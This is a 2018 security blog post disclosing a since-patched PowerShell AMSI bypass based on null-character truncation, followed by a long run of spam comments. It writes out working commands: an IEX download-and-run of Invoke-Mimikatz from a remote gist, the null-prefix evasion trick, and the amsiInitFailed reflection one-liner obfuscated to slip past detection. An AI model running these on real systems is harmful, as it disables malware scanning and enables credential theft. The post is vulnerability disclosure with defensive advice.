Friday, February 16, 2018

AMSI Bypass With a Null Character

In this blog post, I am going to look into a flaw I reported a few months ago and see how the flaw could have been exploited to execute malicious PowerShell scripts and commands while bypassing AMSI based detection. This issue has been fixed as defense-in-depth with the February Update.

What is AMSI

AMSI, Anti-malware Scan Interface, is a mechanism Windows 10+ provides security software vendors for developing software that subscribes certain events and detects malicious contents. AMSI issues several types of events, but the most commonly used one by the software vendors is arguably the events about execution of scripts, where software can receive contents of those scripts and commands about to be executed (I will refer to them as contents simply), then scan and block them. 

The below illustration is an overview of how this event is generated and notified to security software for scanning.


The red boxes are security software that subscribes the events from AMSI and are called AMSI providers. When supported script engines such as PowerShell (i.e., System.Management.Automation.dll) and Windows Script Host (e.g., JScript.dll) execute contents, they call one of the functions exported from amsi.dll with the contents to scan with AMSI providers.  

As illustrated above, AMSI providers rely on script engines to call the exported function and forward contents properly through amsi.dll; or, they would not receive contents and detect malicious strings.

The Bug

The bug fixed was System.Management.Automation.dll did not take account of that PowerShell contents could include null characters in them and called AmsiScanString, which treated a null character as the end of contents, to forward contents to AMSI providers. Here is the prototype of the API.
----
HRESULT WINAPI AmsiScanString(
  _In_     HAMSICONTEXT amsiContext,
  _In_     LPCWSTR      string,   // Will be terminated at the first null character
  _In_     LPCWSTR      contentName,
  _In_opt_ HAMSISESSION session,
  _Out_    AMSI_RESULT  *result
);
----

Because of this bug, amsi.dll could truncate contents (value of "string" above) at the first null character and then send to AMSI providers. This results in that AMSI providers not being able to scan all of the contents and detect malicious strings.

Exploitation

The basic idea for exploitation is to place a null character into PowerShell contents before malicious strings appear.

File Based Exploitation

As a basic exploitation scenario, let us assume we are trying to execute Invoke-Mimikatz like this and being detected.
----
> powershell "IEX (New-Object Net.WebClient).DownloadString('https://gist.github.com/tandasat/4958959cdeb1d0ac6dd1c70654b11e83/raw/Invoke-DefaultMimikatz.ps1')"
----


This is because the contents being Invoke-Expression'd are visible to AMSI providers as shown in the below screenshot.

Such detection can be bypassed by placing a null character at the beginning of the file being Invoke-Expression'd.

----
> powershell "IEX (New-Object Net.WebClient).DownloadString('https://gist.github.com/tandasat/4958959cdeb1d0ac6dd1c70654b11e83/raw/Invoke-BypassingMimikatz.ps1')"
----
This successfully bypasses scan and detection by AMSI providers as seen below ("Get-ChildItem Function: | Select-String Invoke" is added for a demonstration purpose).


Command Line Based Exploitation

With the above successful bypass, you might try to execute loaded Invoke-Mimikatz like below, but find it gets detected due to an appearance of "Invoke-Mimikatz" in the command line.
----
powershell "IEX (New-Object Net.WebClient).DownloadString('https://gist.github.com/tandasat/4958959cdeb1d0ac6dd1c70654b11e83/raw/Invoke-BypassingMimikatz.ps1'); Invoke-Mimikatz -DumpCerts"
----

A naive approach with Invoke-Expression could bypass process command line based detection but not AMSI based one, as "Invoke-Mimikatz" will still be visible to AMSI providers. Here is such an unsuccessful attempt.
----
powershell "IEX (New-Object Net.WebClient).DownloadString('https://gist.github.com/tandasat/4958959cdeb1d0ac6dd1c70654b11e83/raw/Invoke-BypassingMimikatz.ps1'); IEX ('Invoke-'+'Mimikatz -DumpCerts')"
----

To bypass AMSI detection in this scenario, we can insert a null character into the command line with a bit of string manipulation.
----
powershell "IEX (New-Object Net.WebClient).DownloadString('https://gist.github.com/tandasat/4958959cdeb1d0ac6dd1c70654b11e83/raw/Invoke-BypassingMimikatz.ps1'); IEX ('if(0){{{0}}}' -f $(0 -as [char]) + 'Invoke-'+'Mimikatz -DumpCerts')"
----

The highlighted part prepends a null character that never gets executed to the original command line. A resulted string will look like this.
----
if (0) {<NULL>} the rest of commands
----

This can successfully prevent AMSI providers from receiving all of the contents and detecting "Invoke-Mimikatz."


Summary of Exploitation

For file contents, insert "#<NULL>" at the beginning of the file, and any places where additional scans with AMSI occur. To identify the latter places, some try-and-error will be needed. Using a debugger and logging invocation of AmsiScanString with the below command will be helpful.
----
bp amsi!AmsiScanString "du @rdx;g"
----

For command line contents, wrap them into Invoke-Expression and prepend "'if(0){{{0}}}' -f $(0 -as [char]) +". Here is another step-by-step example to bypass detection on "AmsiUtils" and "amsiInitFailed" in the below contents:
----
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
----

1. Wrap the original contents with Invoke-Expression.
----
IEX ('[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiInitFailed","NonPublic,Static").SetValue($null,$true)')
----

2. Prepend the null character to bypass AMSI based detection.
----
IEX ('if(0){{{0}}}' -f $(0 -as [char]) + '[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiInitFailed","NonPublic,Static").SetValue($null,$true)')
----

3. Make any modification sufficient to bypass command line based detection.
----
IEX ('if(0){{{0}}}' -f $(0 -as [char]) + '[Ref].Assembly.GetType("System.Management.Automation.Amsi'+'Utils").GetField("amsi'+'InitFailed","NonPublic,Static").SetValue($null,$true)')
----

It is worth noting that this exploitation is usable even on the Constrained Language Mode and does not trigger any event logs, unlike the most of AMSI bypass techniques which use reflection.

Fix and Recommendation

The fix Microsoft made was to use AmsiScanBuffer instead of AmsiScanString in System.Management.Automation.dll. As shown below, this function accepts arbitrary byte sequence for contents.
----
HRESULT WINAPI AmsiScanBuffer(
  _In_     HAMSICONTEXT amsiContext,
  _In_     PVOID        buffer,  // Not terminated at the null character
  _In_     ULONG        length,
  _In_     LPCWSTR      contentName,
  _In_opt_ HAMSISESSION session,
  _Out_    AMSI_RESULT  *result
  );
----

This way, AMSI providers can receive and scan entire contents even if a null character appears in the middle.

In theory, no action other than applying the patch should be required. However, software vendors using AMSI to scan PowerShell contents should review whether it can handle null characters properly should they appear.

Additionally, security researchers and users of security software can test if their AMSI providers are vulnerable to the bypass technique and ask vendors to address issues if needed. Also, it might be worth monitoring any appearance of a null character in PowerShell contents to detect attempts to exploit this issue.

As for other script engines, PowerShell Core is also affected but does not have a patch as of this writing yet. Windows Script Host is not affected as its interpreter stops reading script contents at the first null character, unlike PowerShell.

Acknowledgement

Kudos to Alex Ionescu (@aionescu) for helping me report this issue, and Microsoft for fixing it.
Posted by at

21 comments:

  1. seemant bishtMarch 1, 2018 at 2:32 AM

    Good Work and thanks for the approach.

    ReplyDelete
  2. Satoshi TandaMarch 1, 2018 at 6:26 AM

    Glad you like it.

    ReplyDelete
  3. bob sadinoApril 2, 2018 at 5:37 AM

    thank you

    ReplyDelete
  4. KelseyJune 19, 2018 at 10:01 PM

    The postings on your site are always excellent. Thanks for the great share and keep up this great work!
    Get Free anti malware tool.

    ReplyDelete
  5. Clipping SolutionsAugust 6, 2018 at 11:19 PM

    Superb post ! worth reading your blog
    clipping path service
    Raster To vector
    clipping path service
    Background Removal

    ReplyDelete
  6. UnknownSeptember 30, 2018 at 6:56 AM

    Yes few

    ReplyDelete
  7. virusremovalguidelinesOctober 26, 2018 at 5:06 AM

    I love reading the blogs on this platform as they are so easy to understand very informative. Great work! 9.4 Million Passengers affected by Cathay Pacific’s Data Breach

    ReplyDelete
  8. Md Enamul HoqNovember 27, 2018 at 10:38 PM

    Good article and your writing technique is really wonderful . Like this post . Clipping Path | Remove White Background | Product Photo Editing

    ReplyDelete
  9. Clipping Path ServiceDecember 4, 2018 at 2:36 AM

    I m so glad to visit this blog.This blog is really so amazing
    clipping path service

    ReplyDelete
  10. Clipping Path ArtsJanuary 30, 2019 at 3:37 AM

    Great post
    clipping path

    ReplyDelete
  11. Lisa MariaFebruary 3, 2019 at 9:14 PM

    Very effective and useful article. I was finding professional clipping path service provider but after seeing your post I can remove background easily.

    ReplyDelete
  12. PiXelz CenterFebruary 22, 2019 at 9:48 PM

    Your concept is really exceptional. I would like to thank for the efforts you have made in writing this article and I hope to get best article from you in the future.
    Clipping Path | Image Masking | Photo Retouching | Photo Manipulation

    ReplyDelete
  13. Farhan Tanvir- Graphics Experts LtdMarch 12, 2019 at 6:12 AM

    Given article is very helpful and very useful for my admin, and pardon me permission to share articles here hopefully helped :
    remove background from image

    ReplyDelete
  14. Joy ShawnMarch 18, 2019 at 10:52 PM

    Great post
    This blog is really so amazinghttp://clippingpathindie.com/raw-image.html

    ReplyDelete
  15. Clipping Path Service IndiaApril 15, 2019 at 4:33 PM

    I really enjoyed your blog Thanks for sharing such an informative post.
    Clipping Path Service

    ReplyDelete
  16. Graphic AidMay 2, 2019 at 10:35 PM

    Nice.
    https://www.graphic-aid.com/clipping-path
    https://www.graphic-aid.com/
    https://www.graphic-aid.com/neck-joint-service
    https://www.graphic-aid.com/photo-color-correction

    ReplyDelete
  17. Service Center VivoMay 6, 2019 at 6:51 PM

    Indonesia
    Easy
    Learning
    Indonesian
    Jual Beli HP
    bimbelbateraiLampung
    Service HPlampungservice.com

    ReplyDelete
  18. lampungservice.comMay 6, 2019 at 7:43 PM

    lampung
    www.lampungservice.com
    oppo
    iPhone
    Maspion
    Makalahandroid
    Natar

    ReplyDelete
  19. MasonMay 7, 2019 at 1:28 AM

    Fantastic article! I hope you spend lot of time for writing the article, then you did success. Clipping Expert Asia is the best product photo editing service provider around the world. Which provides high-quality e-commerce product photo editing that ensures to make the images appealing and professional.

    ReplyDelete
  20. photo retouching servicesMay 15, 2019 at 2:48 AM

    Thanks for sharing this nice post. Clipping expert Asia is the best high-quality
    real estate photo editing service at a cheap price.

    ReplyDelete
  21. Expert ClippingMay 23, 2019 at 2:07 PM

    Wow it is really wonderful and awesome thus it is very much useful for me to understand many concepts and helped me a lot. it is really explainable very well and I got more information from your blog.
    clipping path services

    ReplyDelete

Subscribe to: Post Comments (Atom)